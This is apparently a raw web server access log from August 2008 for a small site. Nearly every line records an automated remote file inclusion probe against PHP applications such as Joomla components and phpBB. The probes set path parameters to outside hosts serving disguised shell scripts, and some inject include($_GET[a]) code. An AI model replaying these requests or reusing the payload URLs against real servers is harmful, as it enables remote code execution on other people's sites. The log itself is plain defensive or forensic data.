66.135.39.118 - - [31/Aug/2008:10:07:03 -0700] "GET /logs/access_080707.log/convert/mvcw.php?step=1&vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.111.184.180 - - [31/Aug/2008:10:07:03 -0700] "GET /logs/access_080806.log/head.php?adresa=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.111.184.180 - - [31/Aug/2008:10:07:04 -0700] "GET /head.php?adresa=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.111.184.180 - - [31/Aug/2008:10:07:04 -0700] "GET /logs/head.php?adresa=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.214.80.199 - - [31/Aug/2008:10:07:08 -0700] "GET /logs/access_080702.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://jofchurch.org/calendar//tools//mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.214.80.199 - - [31/Aug/2008:10:07:09 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://jofchurch.org/calendar//tools//mraneti.txt??? HTTP/1.1" 200 3711 "-" "libwww-perl/5.79" "www.dmulk.com"
204.214.80.199 - - [31/Aug/2008:10:07:09 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://jofchurch.org/calendar//tools//mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.135.39.118 - - [31/Aug/2008:10:07:14 -0700] "GET /logs/access_080522.log/convert/mvcw.php?vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.135.39.118 - - [31/Aug/2008:10:07:16 -0700] "GET /logs/access_080522.log/convert/mvcw.php?step=1&vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.147.236.10 - - [31/Aug/2008:10:07:35 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
67.18.29.218 - - [31/Aug/2008:10:07:36 -0700] "GET /logs/access_080808.log/modul.php?mod=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.29.218 - - [31/Aug/2008:10:07:36 -0700] "GET /modul.php?mod=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.147.236.10 - - [31/Aug/2008:10:07:37 -0700] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
67.18.29.218 - - [31/Aug/2008:10:07:37 -0700] "GET /logs/modul.php?mod=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.180.241.37 - - [31/Aug/2008:10:07:39 -0700] "GET /logs/access_080218.log/index.php?option=com_search&Itemid=&mosConfig_absolute_path=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.128.122.28 - - [31/Aug/2008:10:07:57 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.ballettschule-tulln.at/htaccess/t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
217.128.122.28 - - [31/Aug/2008:10:07:57 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.ballettschule-tulln.at/htaccess/t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
89.108.64.208 - - [31/Aug/2008:10:08:18 -0700] "GET /logs/access_080727.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://jofchurch.org/calendar//tools//mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
204.214.80.199 - - [31/Aug/2008:10:08:44 -0700] "GET /logs/access_080727.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://jofchurch.org/calendar//tools//mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.135.38.88 - - [31/Aug/2008:10:08:50 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://outsourcing.in.ua/data/apteka/.log/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.135.38.88 - - [31/Aug/2008:10:08:50 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://outsourcing.in.ua/data/apteka/.log/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.205.111.117 - - [31/Aug/2008:10:08:54 -0700] "GET /logs/access_080507.log%20/index.php?pag=http://amc.phpnet.us/AMCrew.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.186.26 - - [31/Aug/2008:10:09:09 -0700] "GET /logs/access_080114.log/convert/mvcw.php?vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
88.208.118.47 - - [31/Aug/2008:10:09:12 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
88.208.118.47 - - [31/Aug/2008:10:09:12 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
147.102.106.10 - - [31/Aug/2008:10:09:19 -0700] "GET /logs/modifyform.html?code=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
147.102.106.10 - - [31/Aug/2008:10:09:19 -0700] "GET /modifyform.html?code=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
216.246.8.237 - - [31/Aug/2008:10:09:23 -0700] "GET /logs/access_080524.log/sitemap.xml.php?mosConfig_absolute_path=http://209.85.60.69/~spywaret/otro/clientscript/vbulletin_css/fonts.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.8.237 - - [31/Aug/2008:10:09:23 -0700] "GET /sitemap.xml.php?mosConfig_absolute_path=http://209.85.60.69/~spywaret/otro/clientscript/vbulletin_css/fonts.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.8.237 - - [31/Aug/2008:10:09:23 -0700] "GET /logs/sitemap.xml.php?mosConfig_absolute_path=http://209.85.60.69/~spywaret/otro/clientscript/vbulletin_css/fonts.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.218.141.5 - - [31/Aug/2008:10:09:45 -0700] "GET /logs/access_080707.log/convert/mvcw.php?step=1&vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
217.160.162.88 - - [31/Aug/2008:10:09:52 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
217.160.162.88 - - [31/Aug/2008:10:09:52 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
67.205.111.117 - - [31/Aug/2008:10:10:03 -0700] "GET /logs/index.php?do=http://amc.phpnet.us/AMCrew.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.111.117 - - [31/Aug/2008:10:10:03 -0700] "GET /logs/access_080727.log/index.php?do=http://amc.phpnet.us/AMCrew.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.135.38.88 - - [31/Aug/2008:10:10:03 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://outsourcing.in.ua/data/apteka/.log/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.135.38.88 - - [31/Aug/2008:10:10:03 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://outsourcing.in.ua/data/apteka/.log/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.205.111.117 - - [31/Aug/2008:10:10:04 -0700] "GET /index.php?do=http://amc.phpnet.us/AMCrew.txt???? HTTP/1.1" 200 89452 "-" "libwww-perl/5.805" "www.dmulk.com"
213.218.141.5 - - [31/Aug/2008:10:10:07 -0700] "GET /logs/access_080614.log/convert/mvcw.php?step=1&vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.212.186.26 - - [31/Aug/2008:10:10:07 -0700] "GET /logs/access_080114.log/convert/mvcw.php?step=1&vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.214.57.36 - - [31/Aug/2008:10:10:08 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
85.214.57.36 - - [31/Aug/2008:10:10:08 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
67.18.29.218 - - [31/Aug/2008:10:10:36 -0700] "GET /logs/access_080820.log/?mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.29.218 - - [31/Aug/2008:10:10:37 -0700] "GET /?mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 89592 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.29.218 - - [31/Aug/2008:10:10:39 -0700] "GET /logs/?mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 63000 "-" "libwww-perl/5.805" "www.dmulk.com"
216.246.8.237 - - [31/Aug/2008:10:10:40 -0700] "GET /logs/access_080525.log/sitemap.xml.php?mosConfig_absolute_path=http://209.85.60.69/~spywaret/otro/clientscript/vbulletin_css/fonts.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.8.237 - - [31/Aug/2008:10:10:51 -0700] "GET /logs/access_080313.log/download.php?phpbb_root_path=http://209.85.60.69/~spywaret/otro/clientscript/vbulletin_css/fonts.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.8.237 - - [31/Aug/2008:10:10:51 -0700] "GET /download.php?phpbb_root_path=http://209.85.60.69/~spywaret/otro/clientscript/vbulletin_css/fonts.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.8.237 - - [31/Aug/2008:10:10:51 -0700] "GET /logs/download.php?phpbb_root_path=http://209.85.60.69/~spywaret/otro/clientscript/vbulletin_css/fonts.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
68.178.147.145 - - [31/Aug/2008:10:10:55 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
68.178.147.145 - - [31/Aug/2008:10:10:55 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
216.246.8.237 - - [31/Aug/2008:10:10:56 -0700] "GET /logs/access_080126.log/download.php?phpbb_root_path=http://209.85.60.69/~spywaret/otro/clientscript/vbulletin_css/fonts.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.18.29.218 - - [31/Aug/2008:10:11:04 -0700] "GET /logs/access_080528.log/?mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.29.218 - - [31/Aug/2008:10:11:06 -0700] "GET /logs/access_080711.log/errors.php?error=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
164.41.101.38 - - [31/Aug/2008:10:11:11 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://home.bellavillapattaya.com/modul/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
164.41.101.38 - - [31/Aug/2008:10:11:11 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://home.bellavillapattaya.com/modul/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.180.241.37 - - [31/Aug/2008:10:11:22 -0700] "GET /logs/access_070927.log/index.php?p=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.180.241.37 - - [31/Aug/2008:10:11:23 -0700] "GET /index.php?p=http://www.topyn.com/ips.txt? HTTP/1.1" 200 89355 "-" "libwww-perl/5.810" "www.dmulk.com"
216.180.241.37 - - [31/Aug/2008:10:11:23 -0700] "GET /logs/index.php?p=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.86.37.2 - - [31/Aug/2008:10:11:30 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
70.86.37.2 - - [31/Aug/2008:10:11:32 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
213.218.141.5 - - [31/Aug/2008:10:11:43 -0700] "GET /logs/access_080707.log/convert/mvcw.php?vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
85.17.6.7 - - [31/Aug/2008:10:11:55 -0700] "GET /logs/access_080702.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
85.17.6.7 - - [31/Aug/2008:10:11:55 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
85.17.6.7 - - [31/Aug/2008:10:11:56 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 200 3711 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
85.17.6.7 - - [31/Aug/2008:10:11:57 -0700] "GET /logs/access_080727.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
66.135.39.118 - - [31/Aug/2008:10:12:04 -0700] "GET /logs/access_080702.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
66.135.39.118 - - [31/Aug/2008:10:12:04 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
66.135.39.118 - - [31/Aug/2008:10:12:05 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 200 3711 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
67.192.48.154 - - [31/Aug/2008:10:12:12 -0700] "GET /sitemap.xml.php?mosConfig_absolute_path=http://209.85.60.69/~spywaret/otro/clientscript/vbulletin_css/css.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
67.192.48.154 - - [31/Aug/2008:10:12:12 -0700] "GET /logs/sitemap.xml.php?mosConfig_absolute_path=http://209.85.60.69/~spywaret/otro/clientscript/vbulletin_css/css.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
74.205.57.211 - - [31/Aug/2008:10:12:13 -0700] "GET /sitemap.xml.php?mosConfig_absolute_path=http://209.85.60.69/~spywaret/otro/clientscript/vbulletin_css/css.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
74.205.57.211 - - [31/Aug/2008:10:12:13 -0700] "GET /logs/sitemap.xml.php?mosConfig_absolute_path=http://209.85.60.69/~spywaret/otro/clientscript/vbulletin_css/css.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
213.218.141.5 - - [31/Aug/2008:10:12:15 -0700] "GET /logs/access_080614.log/convert/mvcw.php?vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
217.147.236.10 - - [31/Aug/2008:10:12:17 -0700] "GET /logs/access_080224.log/errors.php?error=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
67.18.29.218 - - [31/Aug/2008:10:12:18 -0700] "GET /logs/access_080604.log/errors.php?error=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.210.139.66 - - [31/Aug/2008:10:12:23 -0700] "GET /logs/access_080727.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
62.210.139.66 - - [31/Aug/2008:10:12:23 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
62.210.139.66 - - [31/Aug/2008:10:12:23 -0700] "GET /logs/access_080507.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
62.210.139.66 - - [31/Aug/2008:10:12:23 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 200 3711 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
85.17.6.7 - - [31/Aug/2008:10:12:26 -0700] "GET /logs/access_080507.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
66.135.39.118 - - [31/Aug/2008:10:12:33 -0700] "GET /logs/access_080727.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
66.135.39.118 - - [31/Aug/2008:10:12:40 -0700] "GET /logs/access_080507.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
89.108.64.208 - - [31/Aug/2008:10:13:14 -0700] "GET /logs/atom.php5?page=http://jofchurch.org/calendar//tools//mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.64.208 - - [31/Aug/2008:10:13:14 -0700] "GET /atom.php5?page=http://jofchurch.org/calendar//tools//mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
207.172.94.26 - - [31/Aug/2008:10:13:26 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.dmulk.com"
66.135.39.118 - - [31/Aug/2008:10:13:51 -0700] "GET /logs/access_080114.log/convert/mvcw.php?step=1&vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.135.39.118 - - [31/Aug/2008:10:13:52 -0700] "GET /logs/access_080114.log/convert/mvcw.php?vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
97.102.114.191 - - [31/Aug/2008:10:13:58 -0700] "GET /logs/access_080412.log/?sourcedir=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.162.88 - - [31/Aug/2008:10:14:04 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "dmulk.com"
217.160.162.88 - - [31/Aug/2008:10:14:04 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "dmulk.com"
89.108.64.208 - - [31/Aug/2008:10:14:06 -0700] "GET /logs/access_080722.log/atom.php5?page=http://jofchurch.org/calendar//tools//mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.64.208 - - [31/Aug/2008:10:14:06 -0700] "GET /atom.php5?page=http://jofchurch.org/calendar//tools//mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.64.208 - - [31/Aug/2008:10:14:07 -0700] "GET /logs/atom.php5?page=http://jofchurch.org/calendar//tools//mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.111.176.106 - - [31/Aug/2008:10:14:13 -0700] "GET /logs/access_080411.log/modul.php?mod=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.72.112.223 - - [31/Aug/2008:10:14:23 -0700] "GET /dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
64.72.112.223 - - [31/Aug/2008:10:14:23 -0700] "GET /logs/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
